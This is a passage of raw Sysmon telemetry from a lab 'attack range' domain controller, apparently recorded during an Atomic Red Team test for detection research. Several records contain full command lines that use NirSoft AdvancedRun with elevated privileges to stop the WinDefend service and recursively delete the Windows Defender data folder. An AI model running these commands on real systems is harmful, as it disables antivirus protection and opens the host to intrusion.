choose.AdvancedRunNirSoftAdvancedRun.exe"C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /WindowState 0 /CommandLine "rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse" /StartDirectory /RunAs 8 /RunC:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-EB14-61EA-1F03-000000002702}2120C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} ATTACKRANGE\Administrator 734700x80000000000000003942447Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.937{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942446Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.937{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942445Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.937{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942444Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.937{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942443Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.937{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942442Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.937{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942441Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.937{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942440Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.937{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000003942438Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.937{834264DD-DAF8-61EA-5B00-000000002702}41004116C:\Windows\system32\csrss.exe{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003942437Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.937{834264DD-EB14-61EA-1F03-000000002702}21201092C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11ATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000003942436Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.937{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe" /EXEFilename C:\Windows\System32\sc.exe /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory /RunAs 8 /RunC:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-EB14-61EA-1F03-000000002702}2120C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} ATTACKRANGE\Administrator 154100x80000000000000003942185Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.762{834264DD-EB14-61EA-1F03-000000002702}2120C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000003941248Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:18:59.950{834264DD-EB03-61EA-1503-000000002702}6024C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if(Test-Path -Path C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 11241100x80000000000000003941242Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:18:59.839{834264DD-EB02-61EA-1403-000000002702}4352C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exe2022-01-21 17:18:59.839ATTACKRANGE\Administrator 154100x80000000000000003940357Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:18:58.407{834264DD-EB02-61EA-1303-000000002702}1184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if(Test-Path -Path C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000003939728Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:18:23.826{834264DD-EADF-61EA-1003-000000002702}4456C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if(Test-Path -Path C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000003938891Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:18:22.380{834264DD-EADE-61EA-0E03-000000002702}612C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if(Test-Path -Path C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000003936523Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:16:40.279{834264DD-EA78-61EA-FB02-000000002702}1396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if(Test-Path -Path C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000003935686Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:16:38.954{834264DD-EA76-61EA-F902-000000002702}424C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if(Test-Path -Path C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000003934851Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:16:00.931{834264DD-EA50-61EA-F002-000000002702}5284C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if(Test-Path -Path C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 11241100x80000000000000003934843Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:16:00.819{834264DD-EA4F-61EA-EE02-000000002702}680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe2022-01-20 22:16:31.571ATTACKRANGE\Administrator 23542300x80000000000000003934842Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:16:00.819{834264DD-EA4F-61EA-EE02-000000002702}680ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8truetrue 154100x80000000000000003933762Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:15:59.401{834264DD-EA4F-61EA-ED02-000000002702}6104C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if(Test-Path -Path C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000003933343Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:15:47.385{834264DD-EA43-61EA-EA02-000000002702}384C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if(Test-Path -Path C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000003932930Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:15:27.667{834264DD-EA2F-61EA-E702-000000002702}4984C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if(Test-Path -Path C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe\advancedrun.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000003928878Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:39.600{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeATTACKRANGE\Administrator 10341000x80000000000000003928862Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.492{834264DD-DB11-61EA-9500-000000002702}4284528C:\Windows\Explorer.EXE{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003928857Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.492{834264DD-DB11-61EA-9500-000000002702}4285540C:\Windows\Explorer.EXE{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003928856Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.492{834264DD-DB11-61EA-9500-000000002702}4285540C:\Windows\Explorer.EXE{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003928855Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 